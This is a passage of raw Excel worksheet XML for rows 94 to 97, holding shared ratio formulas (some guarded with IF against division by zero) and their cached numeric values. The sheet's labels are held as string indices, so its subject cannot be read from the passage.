        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BE94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="BF94" s="501">
        <f t="shared" si="96"/>
        <v>1.5</v>
      </c>
      <c r="BG94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="BH94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="BI94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="BJ94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="BK94" s="501">
        <f t="shared" si="96"/>
        <v>3</v>
      </c>
      <c r="BL94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="BM94" s="501">
        <f t="shared" si="96"/>
        <v>5.955953827</v>
      </c>
      <c r="BN94" s="501">
        <f t="shared" si="96"/>
        <v>0.6</v>
      </c>
      <c r="BO94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BP94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BQ94" s="501">
        <f t="shared" si="96"/>
        <v>1.1</v>
      </c>
      <c r="BR94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BS94" s="501">
        <f t="shared" si="96"/>
        <v>2.5</v>
      </c>
      <c r="BT94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="BU94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BV94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="BW94" s="501">
        <f t="shared" si="96"/>
        <v>4</v>
      </c>
      <c r="BX94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="BY94" s="501">
        <f t="shared" si="96"/>
        <v>15</v>
      </c>
      <c r="BZ94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="CA94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="CB94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="CC94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="CD94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="CE94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="CF94" s="501">
        <f t="shared" si="96"/>
        <v>2</v>
      </c>
      <c r="CG94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="CH94" s="501">
        <f t="shared" si="96"/>
        <v>2</v>
      </c>
      <c r="CI94" s="501">
        <f t="shared" si="96"/>
        <v>22</v>
      </c>
      <c r="CJ94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="CK94" s="501">
        <f t="shared" si="96"/>
        <v>6</v>
      </c>
      <c r="CL94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="CM94" s="501">
        <f t="shared" si="96"/>
        <v>4.6</v>
      </c>
      <c r="CN94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="CO94" s="501">
        <f t="shared" si="96"/>
        <v>1.666666667</v>
      </c>
      <c r="CP94" s="501">
        <f t="shared" si="96"/>
        <v>10</v>
      </c>
      <c r="CQ94" s="501">
        <f t="shared" si="96"/>
        <v>2</v>
      </c>
      <c r="CR94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="CS94" s="501">
        <f t="shared" si="96"/>
        <v>0.001868193624</v>
      </c>
      <c r="CT94" s="501">
        <f t="shared" si="96"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="CV94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="CW94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="CX94" s="501">
        <f t="shared" si="96"/>
        <v>2</v>
      </c>
      <c r="CY94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="CZ94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="DA94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="DB94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="DC94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="DD94" s="501">
        <f t="shared" si="96"/>
        <v>3.5</v>
      </c>
      <c r="DE94" s="501">
        <f t="shared" si="96"/>
        <v>2</v>
      </c>
      <c r="DF94" s="501">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="DG94" s="501" t="str">
        <f t="shared" si="96"/>
        <v>-</v>
      </c>
      <c r="DH94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="DI94" s="501">
        <f t="shared" si="96"/>
        <v>1</v>
      </c>
      <c r="DJ94" s="502">
        <f t="shared" si="96"/>
        <v>1.181818182</v>
      </c>
      <c r="DK94" s="271"/>
      <c r="DO94" s="279"/>
      <c r="DP94" s="271"/>
      <c r="DU94" s="271"/>
      <c r="DV94" s="271"/>
      <c r="EA94" s="271"/>
      <c r="EB94" s="271"/>
      <c r="EC94" s="271"/>
      <c r="ED94" s="280"/>
      <c r="EG94" s="279"/>
      <c r="EH94" s="271"/>
      <c r="EI94" s="271"/>
      <c r="EJ94" s="271"/>
      <c r="EK94" s="271"/>
      <c r="EL94" s="271"/>
      <c r="EM94" s="271"/>
      <c r="EN94" s="271"/>
      <c r="EO94" s="271"/>
      <c r="EP94" s="271"/>
      <c r="EQ94" s="271"/>
      <c r="ER94" s="271"/>
      <c r="ES94" s="271"/>
      <c r="ET94" s="271"/>
      <c r="EU94" s="271"/>
      <c r="EV94" s="271"/>
      <c r="EW94" s="271"/>
      <c r="EX94" s="271"/>
      <c r="EY94" s="271"/>
      <c r="EZ94" s="271"/>
      <c r="FA94" s="280"/>
    </row>
    <row r="95">
      <c r="J95" s="277"/>
      <c r="K95" s="352" t="s">
        <v>2588</v>
      </c>
      <c r="L95" s="403" t="s">
        <v>2589</v>
      </c>
      <c r="M95" s="403" t="s">
        <v>2590</v>
      </c>
      <c r="N95" s="404" t="s">
        <v>2591</v>
      </c>
      <c r="O95" s="278"/>
      <c r="Q95" s="271"/>
      <c r="R95" s="386" t="s">
        <v>2562</v>
      </c>
      <c r="S95" s="501">
        <f t="shared" ref="S95:AF95" si="97">S47/S$29</f>
        <v>0.7537281636</v>
      </c>
      <c r="T95" s="501">
        <f t="shared" si="97"/>
        <v>0.9998561358</v>
      </c>
      <c r="U95" s="501">
        <f t="shared" si="97"/>
        <v>0.9677419355</v>
      </c>
      <c r="V95" s="501">
        <f t="shared" si="97"/>
        <v>1.166666667</v>
      </c>
      <c r="W95" s="501">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="X95" s="501">
        <f t="shared" si="97"/>
        <v>2017.142857</v>
      </c>
      <c r="Y95" s="501">
        <f t="shared" si="97"/>
        <v>1.857142857</v>
      </c>
      <c r="Z95" s="501">
        <f t="shared" si="97"/>
        <v>16.47055352</v>
      </c>
      <c r="AA95" s="501">
        <f t="shared" si="97"/>
        <v>1.273972603</v>
      </c>
      <c r="AB95" s="501">
        <f t="shared" si="97"/>
        <v>3.947368421</v>
      </c>
      <c r="AC95" s="501">
        <f t="shared" si="97"/>
        <v>4</v>
      </c>
      <c r="AD95" s="501">
        <f t="shared" si="97"/>
        <v>0.002318866598</v>
      </c>
      <c r="AE95" s="501">
        <f t="shared" si="97"/>
        <v>1.666666667</v>
      </c>
      <c r="AF95" s="502">
        <f t="shared" si="97"/>
        <v>1.75087108</v>
      </c>
      <c r="AG95" s="271"/>
      <c r="AH95" s="386" t="s">
        <v>2562</v>
      </c>
      <c r="AI95" s="501">
        <f t="shared" ref="AI95:DJ95" si="98">IF(AI$29=0,"-",AI47/AI$29)</f>
        <v>0.7530903666</v>
      </c>
      <c r="AJ95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="AK95" s="501">
        <f t="shared" si="98"/>
        <v>4</v>
      </c>
      <c r="AL95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="AM95" s="501">
        <f t="shared" si="98"/>
        <v>0.9998561358</v>
      </c>
      <c r="AN95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="AO95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="AP95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="AQ95" s="501">
        <f t="shared" si="98"/>
        <v>0.9210526316</v>
      </c>
      <c r="AR95" s="501">
        <f t="shared" si="98"/>
        <v>0.75</v>
      </c>
      <c r="AS95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="AT95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="AU95" s="501">
        <f t="shared" si="98"/>
        <v>3.5</v>
      </c>
      <c r="AV95" s="501">
        <f t="shared" si="98"/>
        <v>1.333333333</v>
      </c>
      <c r="AW95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="AX95" s="501">
        <f t="shared" si="98"/>
        <v>1.333333333</v>
      </c>
      <c r="AY95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="AZ95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="BA95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="BB95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BC95" s="501">
        <f t="shared" si="98"/>
        <v>4705.333333</v>
      </c>
      <c r="BD95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BE95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="BF95" s="501">
        <f t="shared" si="98"/>
        <v>1.5</v>
      </c>
      <c r="BG95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="BH95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="BI95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="BJ95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="BK95" s="501">
        <f t="shared" si="98"/>
        <v>3</v>
      </c>
      <c r="BL95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="BM95" s="501">
        <f t="shared" si="98"/>
        <v>5.958080194</v>
      </c>
      <c r="BN95" s="501">
        <f t="shared" si="98"/>
        <v>23.15444015</v>
      </c>
      <c r="BO95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BP95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BQ95" s="501">
        <f t="shared" si="98"/>
        <v>1.1</v>
      </c>
      <c r="BR95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BS95" s="501">
        <f t="shared" si="98"/>
        <v>3</v>
      </c>
      <c r="BT95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="BU95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BV95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="BW95" s="501">
        <f t="shared" si="98"/>
        <v>4</v>
      </c>
      <c r="BX95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="BY95" s="501">
        <f t="shared" si="98"/>
        <v>15</v>
      </c>
      <c r="BZ95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="CA95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="CB95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="CC95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="CD95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="CE95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="CF95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="CG95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="CH95" s="501">
        <f t="shared" si="98"/>
        <v>7</v>
      </c>
      <c r="CI95" s="501">
        <f t="shared" si="98"/>
        <v>22</v>
      </c>
      <c r="CJ95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="CK95" s="501">
        <f t="shared" si="98"/>
        <v>6</v>
      </c>
      <c r="CL95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="CM95" s="501">
        <f t="shared" si="98"/>
        <v>5.4</v>
      </c>
      <c r="CN95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="CO95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="CP95" s="501">
        <f t="shared" si="98"/>
        <v>10</v>
      </c>
      <c r="CQ95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="CR95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="CS95" s="501">
        <f t="shared" si="98"/>
        <v>0.002171964945</v>
      </c>
      <c r="CT95" s="501">
        <f t="shared" si="98"/>
        <v>0.003992015968</v>
      </c>
      <c r="CU95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="CV95" s="501">
        <f t="shared" si="98"/>
        <v>6</v>
      </c>
      <c r="CW95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="CX95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="CY95" s="501">
        <f t="shared" si="98"/>
        <v>0.5</v>
      </c>
      <c r="CZ95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="DA95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="DB95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="DC95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="DD95" s="501">
        <f t="shared" si="98"/>
        <v>3.5</v>
      </c>
      <c r="DE95" s="501">
        <f t="shared" si="98"/>
        <v>2</v>
      </c>
      <c r="DF95" s="501">
        <f t="shared" si="98"/>
        <v>0</v>
      </c>
      <c r="DG95" s="501" t="str">
        <f t="shared" si="98"/>
        <v>-</v>
      </c>
      <c r="DH95" s="501">
        <f t="shared" si="98"/>
        <v>1.951111111</v>
      </c>
      <c r="DI95" s="501">
        <f t="shared" si="98"/>
        <v>1</v>
      </c>
      <c r="DJ95" s="502">
        <f t="shared" si="98"/>
        <v>1.363636364</v>
      </c>
      <c r="DK95" s="271"/>
      <c r="DO95" s="279"/>
      <c r="DP95" s="271"/>
      <c r="DU95" s="271"/>
      <c r="DV95" s="271"/>
      <c r="EA95" s="271"/>
      <c r="EB95" s="271"/>
      <c r="EC95" s="271"/>
      <c r="ED95" s="280"/>
      <c r="EG95" s="279"/>
      <c r="EH95" s="271"/>
      <c r="EI95" s="271"/>
      <c r="EJ95" s="271"/>
      <c r="EK95" s="271"/>
      <c r="EL95" s="271"/>
      <c r="EM95" s="271"/>
      <c r="EN95" s="271"/>
      <c r="EO95" s="271"/>
      <c r="EP95" s="271"/>
      <c r="EQ95" s="271"/>
      <c r="ER95" s="271"/>
      <c r="ES95" s="271"/>
      <c r="ET95" s="271"/>
      <c r="EU95" s="271"/>
      <c r="EV95" s="271"/>
      <c r="EW95" s="271"/>
      <c r="EX95" s="271"/>
      <c r="EY95" s="271"/>
      <c r="EZ95" s="271"/>
      <c r="FA95" s="280"/>
    </row>
    <row r="96">
      <c r="J96" s="277"/>
      <c r="K96" s="500">
        <f>K61/$N$31</f>
        <v>0.0375917641</v>
      </c>
      <c r="L96" s="501">
        <f t="shared" ref="L96:N96" si="99">L61/$N$34</f>
        <v>13.31625906</v>
      </c>
      <c r="M96" s="501">
        <f t="shared" si="99"/>
        <v>382.3114793</v>
      </c>
      <c r="N96" s="502">
        <f t="shared" si="99"/>
        <v>401.3159404</v>
      </c>
      <c r="O96" s="278"/>
      <c r="Q96" s="271"/>
      <c r="R96" s="352" t="s">
        <v>2564</v>
      </c>
      <c r="S96" s="501">
        <f t="shared" ref="S96:V96" si="100">S48/S$30</f>
        <v>0.0004401731348</v>
      </c>
      <c r="T96" s="501">
        <f t="shared" si="100"/>
        <v>0.000001424625217</v>
      </c>
      <c r="U96" s="501">
        <f t="shared" si="100"/>
        <v>0.119047619</v>
      </c>
      <c r="V96" s="501">
        <f t="shared" si="100"/>
        <v>0.4210526316</v>
      </c>
      <c r="W96" s="501">
        <f t="shared" ref="W96:W127" si="104">W48/W$29</f>
        <v>0</v>
      </c>
      <c r="X96" s="501">
        <f t="shared" ref="X96:AF96" si="101">X48/X$30</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y96" s="501">
        <f t="shared" si="101"/>
        <v>56.57142857</v>
      </c>
      <c r="Z96" s="501">
        <f t="shared" si="101"/>
        <v>0.8725362918</v>
      </c>
      <c r="AA96" s="501">
        <f t="shared" si="101"/>
        <v>0.04322766571</v>
      </c>
      <c r="AB96" s="501">
        <f t="shared" si="101"/>
        <v>0.8695652174</v>
      </c>
      <c r="AC96" s="501">
        <f t="shared" si="101"/>
        <v>2.4</v>
      </c>
      <c r="AD96" s="501">
        <f t="shared" si="101"/>
        <v>0.0003149175053</v>
      </c>
      <c r="AE96" s="501">
        <f t="shared" si="101"/>
        <v>4.111111111</v>
      </c>
      <c r="AF96" s="502">
        <f t="shared" si="101"/>
        <v>0.001650021711</v>
      </c>
      <c r="AG96" s="271"/>
      <c r="AH96" s="352" t="s">
        <v>2564</v>
      </c>
      <c r="AI96" s="518">
        <f t="shared" ref="AI96:DJ96" si="102">IF(AI$30=0,"-",AI48/AI$30)</f>
        <v>0.0003669724771</v>
      </c>
      <c r="AJ96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="AK96" s="518">
        <f t="shared" si="102"/>
        <v>0.25</v>
      </c>
      <c r="AL96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="AM96" s="518">
        <f t="shared" si="102"/>
        <v>0.000001424625217</v>
      </c>
      <c r="AN96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="AO96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="AP96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="AQ96" s="518">
        <f t="shared" si="102"/>
        <v>0.01709401709</v>
      </c>
      <c r="AR96" s="518">
        <f t="shared" si="102"/>
        <v>1</v>
      </c>
      <c r="AS96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="AT96" s="518">
        <f t="shared" si="102"/>
        <v>3</v>
      </c>
      <c r="AU96" s="518">
        <f t="shared" si="102"/>
        <v>2</v>
      </c>
      <c r="AV96" s="518">
        <f t="shared" si="102"/>
        <v>1</v>
      </c>
      <c r="AW96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="AX96" s="518">
        <f t="shared" si="102"/>
        <v>0.5</v>
      </c>
      <c r="AY96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="AZ96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BA96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BB96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BC96" s="518">
        <f t="shared" si="102"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BE96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BF96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BG96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BH96" s="518">
        <f t="shared" si="102"/>
        <v>396</v>
      </c>
      <c r="BI96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BJ96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BK96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BL96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BM96" s="518">
        <f t="shared" si="102"/>
        <v>0.1859052248</v>
      </c>
      <c r="BN96" s="518">
        <f t="shared" si="102"/>
        <v>1.309073359</v>
      </c>
      <c r="BO96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BP96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BQ96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BR96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BS96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BT96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BU96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BV96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BW96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="BX96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="BY96" s="518">
        <f t="shared" si="102"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ96" s="518">
        <f t="shared" si="102"/>
        <v>0.08130081301</v>
      </c>
      <c r="CA96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CB96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CC96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CD96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CE96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CF96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CG96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CH96" s="518">
        <f t="shared" si="102"/>
        <v>1</v>
      </c>
      <c r="CI96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CJ96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CK96" s="518">
        <f t="shared" si="102"/>
        <v>8</v>
      </c>
      <c r="CL96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CM96" s="518">
        <f t="shared" si="102"/>
        <v>1.5</v>
      </c>
      <c r="CN96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CO96" s="518">
        <f t="shared" si="102"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP96" s="518">
        <f t="shared" si="102"/>
        <v>11.5</v>
      </c>
      <c r="CQ96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CR96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CS96" s="518">
        <f t="shared" si="102"/>
        <v>0.0002915451895</v>
      </c>
      <c r="CT96" s="518">
        <f t="shared" si="102"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CV96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CW96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="CX96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="CY96" s="518">
        <f t="shared" si="102"/>
        <v>16</v>
      </c>
      <c r="CZ96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="DA96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="DB96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="DC96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="DD96" s="518">
        <f t="shared" si="102"/>
        <v>5</v>
      </c>
      <c r="DE96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="DF96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="DG96" s="518" t="str">
        <f t="shared" si="102"/>
        <v>-</v>
      </c>
      <c r="DH96" s="518">
        <f t="shared" si="102"/>
        <v>0.04</v>
      </c>
      <c r="DI96" s="518">
        <f t="shared" si="102"/>
        <v>0</v>
      </c>
      <c r="DJ96" s="519">
        <f t="shared" si="102"/>
        <v>0.09090909091</v>
      </c>
      <c r="DK96" s="271"/>
      <c r="DO96" s="279"/>
      <c r="DP96" s="271"/>
      <c r="DU96" s="271"/>
      <c r="DV96" s="271"/>
      <c r="EA96" s="271"/>
      <c r="EB96" s="271"/>
      <c r="EC96" s="271"/>
      <c r="ED96" s="280"/>
      <c r="EG96" s="279"/>
      <c r="EH96" s="271"/>
      <c r="EI96" s="271"/>
      <c r="EJ96" s="271"/>
      <c r="EK96" s="271"/>
      <c r="EL96" s="271"/>
      <c r="EM96" s="271"/>
      <c r="EN96" s="271"/>
      <c r="EO96" s="271"/>
      <c r="EP96" s="271"/>
      <c r="EQ96" s="271"/>
      <c r="ER96" s="271"/>
      <c r="ES96" s="271"/>
      <c r="ET96" s="271"/>
      <c r="EU96" s="271"/>
      <c r="EV96" s="271"/>
      <c r="EW96" s="271"/>
      <c r="EX96" s="271"/>
      <c r="EY96" s="271"/>
      <c r="EZ96" s="271"/>
      <c r="FA96" s="280"/>
    </row>
    <row r="97">
      <c r="J97" s="277"/>
      <c r="K97" s="434"/>
      <c r="L97" s="353"/>
      <c r="M97" s="353"/>
      <c r="N97" s="354"/>
      <c r="O97" s="278"/>
      <c r="Q97" s="271"/>
      <c r="R97" s="352" t="s">
        <v>2565</v>
      </c>
      <c r="S97" s="501">
        <f t="shared" ref="S97:V97" si="103">S49/S$30</f>
        <v>0.2720269973</v>
      </c>
      <c r="T97" s="501">
        <f t="shared" si="103"/>
        <v>0.004526034314</v>
      </c>
      <c r="U97" s="501">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="V97" s="501">
        <f t="shared" si="103"/>
        <v>2.105263158</v>
      </c>
      <c r="W97" s="501">
        <f t="shared" si="104"/>
        <v>13</v>
      </c>
      <c r="X97" s="501">
        <f t="shared" ref="X97:AF97" si="105">X49/X$30</f>
        <v>7633.714286</v>
      </c>
      <c r="Y97" s="501">
        <f t="shared" si="105"/>
        <v>59.28571429</v>
      </c>
      <c r="Z97" s="501">
        <f t="shared" si="105"/>
        <v>18.82261301</v>
      </c>
      <c r="AA97" s="501">
        <f t="shared" si="105"/>
        <v>0.1066282421</v>
      </c>
      <c r="AB97" s="501">
        <f t="shared" si="105"/>
        <v>8.782608696</v>
      </c>
      <c r="AC97" s="501">
        <f t="shared" si="105"/>
        <v>5.1</v>
      </c>
      <c r="AD97" s="501">
        <f t="shared" si="105"/>
        <v>0.01122749367</v>
      </c>
      <c r="AE97" s="501">
        <f t="shared" si="105"/>
        <v>4.777777778</v>
      </c>
      <c r="AF97" s="502">
        <f t="shared" si="105"/>
        <v>0.5214937039</v>
      </c>
      <c r="AG97" s="271"/>
      <c r="AH97" s="352" t="s">
        <v>2565</v>
      </c>
      <c r="AI97" s="518">
        <f t="shared" ref="AI97:DJ97" si="106">IF(AI$30=0,"-",AI49/AI$30)</f>
        <v>0.271706422</v>
      </c>
      <c r="AJ97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="AK97" s="518">
        <f t="shared" si="106"/>
        <v>1.5</v>
      </c>
      <c r="AL97" s="518">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="AM97" s="518">
        <f t="shared" si="106"/>
        <v>0.004526034314</v>
      </c>
      <c r="AN97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="AO97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="AP97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="AQ97" s="518">
        <f t="shared" si="106"/>
        <v>0.9230769231</v>
      </c>
      <c r="AR97" s="518">
        <f t="shared" si="106"/>
        <v>1.25</v>
      </c>
      <c r="AS97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="AT97" s="518">
        <f t="shared" si="106"/>
        <v>2</v>
      </c>
      <c r="AU97" s="518">
        <f t="shared" si="106"/>
        <v>3.5</v>
      </c>
      <c r="AV97" s="518">
        <f t="shared" si="106"/>
        <v>2</v>
      </c>
      <c r="AW97" s="518" t="str">
        <f t="shared" si="106"/>
        <v>-</v>
      </c>
      <c r="AX97" s="518">
        <f t="shared" si="106"/>
